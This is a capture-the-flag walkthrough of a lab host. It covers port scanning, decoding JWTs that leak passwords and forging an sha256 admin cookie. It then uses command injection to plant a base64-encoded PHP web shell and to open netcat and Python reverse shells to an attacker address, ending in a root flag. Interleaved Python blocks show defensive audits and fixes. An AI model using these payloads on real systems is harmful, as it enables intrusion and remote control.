E:\PENTEST\NMAP>nmap -p- 10.150.150.100
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-19 15:38 W. Europe Standard Time
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 72.50% done; ETC: 15:38 (0:00:05 remaining)
Nmap scan report for 10.150.150.100
Host is up (0.030s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
8131/tcp open  indigo-vbcp
8148/tcp open  isdd
8154/tcp open  unknown
8169/tcp open  unknown
8214/tcp open  unknown
8422/tcp open  unknown
8600/tcp open  asterix
8795/tcp open  unknown
8971/tcp open  unknown
8984/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 34.23 seconds

E:\PENTEST\NMAP>
E:\PENTEST\NMAP>curl http://10.150.150.100:8131
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaXRzbWUiLCJwYXNzIjoiMmMxN2M2MzkzNzcxZWUzMDQ4YWUzNGQ2YjM4MGM1ZWMifQ.7mndOl98wTtLrPLZN_69UwY4e2sY_lmy_3tSiF3bTkU
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8154/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiZjUyY2FlN2Q2NzdmZDhhODNhYzdjYzQ0MDZjMWQwNzNhNjlhN2IyMyJ9.V1ERq4lFaEr_U9vdE1n43uq-cP5zS8EKaRJKfvhaOjY
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8169
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJqdXBpdGVyIn0.4dA5aV12WciBnX_53pR_Zs0q1FdCwqMBjaRvWMKJlB8
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8214/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8214/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaG9uZXkiLCJwYXNzIjoiMzdjNjA3MTE5OWZjMGQ1NGM3ODA0ZjRlZTY3ZTBiZTFmZjQ5MGUwOWE3MzE2ZWIyMDJmODE4ZDcwOTk1MjU3MGYzMGVmYjE1ZjMwMGQ1ZTYwNmMxZjAxMjdlMTNiMTkwODU0Y2UyMjFkNjllYjg3OTBhZjI4YTQ0NjNmYTZiODEifQ.B7oIwzKMDvqASNqGMeCF65oD8JARDh1rGrR26j6QQE4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8422/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiYTk0YThmZTVjY2IxOWJhNjFjNGMwODczZDM5MWU5ODc5ODJmYmJkMyJ9.5fM1qeavBWXL2_DzbpJD9pPAHsuoKaH6h4WLGEKPCtg
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJiYW5hbmEifQ.7jqCMA8wLvqFf_B_K7xLpJ6HFHUFBtYZjZgKbL__Euk

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>
{"typ":"JWT","alg":"HS256"}.{"user":"richard","pass":"776861746E6F74"}
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"jupiter"}
{"typ":"JWT","alg":"HS256"}.{"user":"honey","pass":"37c6071199fc0d54c7804f4ee67e0be1ff490e09a7316eb202f818d709952570f30efb15f300d5e606c1f0127e13b190854ce221d69eb8790af28a4463fa6b81"}
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"banana"}
{"typ":"JWT","alg":"HS256"}.{"user":"john","pass":"UE9qdnI4Ukp3eHd1aktTZQo="}
=> decode once more => POjvr8RJwxwujKSe
=> login
john / POjvr8RJwxwujKSe
gives FLAG73=26ABDA36DFAE4CBA32ADB2DD5B53EFCFC60875C4
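The tokens above are only base64url-encoded, so the payload claims (here plain and hex- or base64-wrapped passwords) are readable by anyone who obtains a token. The following Python is an added audit example, not code from the writeup: it decodes header and payload without verifying the signature, flags credential-like claims and peels one layer of hex or base64. The token list is copied from the curl output above; the claim-name list and function names are assumptions.

```python
import base64
import json
import re

# Three tokens copied from the curl output above (the list is assembled here).
TOKENS = [
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJqdXBpdGVyIn0.4dA5aV12WciBnX_53pR_Zs0q1FdCwqMBjaRvWMKJlB8",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI",
]
# Claim names treated as credential-like (assumption for this audit).
SENSITIVE_CLAIMS = {"pass", "password", "pwd", "secret", "apikey", "api_key"}
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def b64url_decode(segment):
    """Decode one base64url JWT segment, restoring the padding JWTs omit."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def decode_jwt_unverified(token):
    """Return (header, payload) without checking the signature: the payload is
    only base64url, so whatever it carries is readable by anyone holding it."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def peel_encoding(value):
    """Undo one layer of hex or base64 when the result is printable text."""
    if HEX_RE.match(value):
        raw = bytes.fromhex(value)
    elif B64_RE.match(value) and len(value) % 4 == 0:
        raw = base64.b64decode(value)
    else:
        return None
    text = raw.decode("ascii", errors="replace").strip()
    return text if text.isprintable() and "\ufffd" not in text else None

def audit_token(token):
    """List credential-like claims in the payload, with nested encodings peeled."""
    _header, payload = decode_jwt_unverified(token)
    return [{"user": payload.get("user"), "claim": claim, "value": value,
             "decoded": peel_encoding(value)}
            for claim, value in payload.items()
            if claim.lower() in SENSITIVE_CLAIMS and isinstance(value, str)]

if __name__ == "__main__":
    for tok in TOKENS:
        for f in audit_token(tok):
            print(f"{f['user']}: claim {f['claim']!r} exposes {f['decoded'] or f['value']!r}")
```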
http://10.150.150.100:5000/landing
view-source:http://10.150.150.100:5000/static/door-lib-version1.2.min.js
puckiestyle, [22.02.21 13:37]
hi Jonne, I looked at the JavaScript [ http://10.150.150.100:5000/static/door-lib-version1.2.min.js ] with a beautifier, did find sha256("username:user") & sha256("username:admin") in a console.log, but no idea how to apply this,
Jonne, [22.02.21 13:39]
You can create a cookie with sha256("john:admin")
Jonne, [22.02.21 13:39]
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
Jonne, [22.02.21 13:41]
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 574
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Mon, 22 Feb 2021 13:50:00 GMT
<!DOCTYPE html>
<html>
<head>
<title>Index</title>
</head>
<body>
<p>FLAG74=BCE09F9895DED436359E935D0F77B1CDAE3CBC02</p></br>
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->
<form action="/landing" method="post">
<div class="container">
<label for="target"><b>IP</b></label>
<input type="text" placeholder="Enter IP Address" name="target" autocomplete="off" required>
<button type="submit">Check</button>
</br>
<h3> Connectivity Result: </h3></br>
</div>
<div class="container" style="background-color:#f1f1f1">
</div>
</form>
</body>
</html>
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
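The role cookie that unlocks the admin page is, as the chat above describes, just sha256("username:role") with no server-side secret, so any client who reads the scheme out of the JavaScript can produce the admin value. The block below is an added example, not the lab's code: the weak check next to an HMAC-keyed variant whose tag a client cannot recompute. SERVER_KEY, the cookie layout and all function names are assumptions.

```python
import hashlib
import hmac
import secrets

def weak_role_cookie(username, role):
    """The lab's scheme as the chat describes it: sha256("user:role") with no
    secret, so the 'admin' value for any user is computable client-side."""
    return hashlib.sha256(f"{username}:{role}".encode()).hexdigest()

def weak_is_admin(username, cookie):
    return hmac.compare_digest(cookie, weak_role_cookie(username, "admin"))

# Hardened variant (assumption: a 32-byte key generated at start-up and never
# shipped in client-visible JavaScript).
SERVER_KEY = secrets.token_bytes(32)

def signed_role_cookie(username, role, key=SERVER_KEY):
    """Bind the role to a server-held key: 'user:role.<hmac-sha256>'."""
    payload = f"{username}:{role}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"

def signed_role(cookie, key=SERVER_KEY):
    """Return the role the cookie carries, or None when the tag does not verify."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    _user, has_role, role = payload.partition(":")
    return role if has_role else None

if __name__ == "__main__":
    # Client-side forgery needs nothing but the scheme itself.
    forged = hashlib.sha256(b"john:admin").hexdigest()
    print("weak scheme accepts forged cookie:", weak_is_admin("john", forged))
    # Under the keyed scheme, changing the role invalidates the tag.
    legit = signed_role_cookie("john", "user")
    tampered = legit.replace("john:user", "john:admin")
    print("signed scheme role after tampering:", signed_role(tampered))
```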
rm -f /tmp/p; mknod /tmp/p p && nc 10.66.66.42 4444 0/tmp/p
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing' -d 'target=10.66.66.18; echo "PD9waHAKICAgIGlmKGlzc2V0KCRfR0VUWydjbWQnXSkpCiAgICB7CiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7CiAgICB9CgoK" | base64 -d > /var/www/html/shell.php'
http://10.150.150.100/shell.php?cmd=whoami
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌─[user@parrot-virtual]─[~/ptd/merry-go-round]
└──╼ $sudo nc -nlvp 80
[sudo] password for user:
listening on [any] 80 ...
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.100] 46010
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(happy) gid=1000(happy) groups=1000(happy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
$ whoami
happy
$ sudo /bin/sh
cat flag75.txt
FLAG75=384FA60682220A6AAA314E6A03059215D34A2225
cat flag76.txt
FLAG76=342E17655889D42D4B90E3985BFFB53E6D2EE36F
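The foothold above comes from the landing form's "target" field being spliced into a shell command, so a ';' in an "IP address" runs a second command as the web user. The block below is an added example, not the lab's code: the spliced form beside a hardened handler that accepts only a parseable IP and passes it to ping as its own argv element, plus a simple log-side rule for spotting such input. build_ping_argv, is_injection_attempt and the ping flags are assumptions.

```python
import ipaddress
import subprocess

def vulnerable_command(target):
    """The landing form's behaviour as the writeup shows it: the submitted
    field lands in a shell line, so ';' starts a second command."""
    return f"ping -c 1 {target}"

def build_ping_argv(target):
    """Hardened variant: accept only a syntactically valid IPv4/IPv6 address
    and hand it to ping as a separate argv element (no shell involved)."""
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"rejected connectivity target: {target!r}") from None
    return ["ping", "-c", "1", "-W", "2", str(ip)]

def is_injection_attempt(target):
    """Cheap detection rule for request logs: shell metacharacters or a
    decode-and-write pattern in a field that should only ever hold an IP."""
    markers = (";", "|", "&", "`", "$(", ">", "base64")
    return any(m in target for m in markers)

def run_check(target):
    """Run the connectivity check safely; True when the host answers."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=5)
    return proc.returncode == 0

if __name__ == "__main__":
    # Constructed input shaped like the request shown above
    attack = "10.66.66.18; echo PAYLOAD | base64 -d > /var/www/html/shell.php"
    print(vulnerable_command(attack))      # the whole line reaches /bin/sh
    print(is_injection_attempt(attack))    # True
    try:
        build_ping_argv(attack)
    except ValueError as err:
        print(err)                         # rejected before anything runs
    print(build_ping_argv("10.66.66.18"))
```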
Author : Puckiestyle

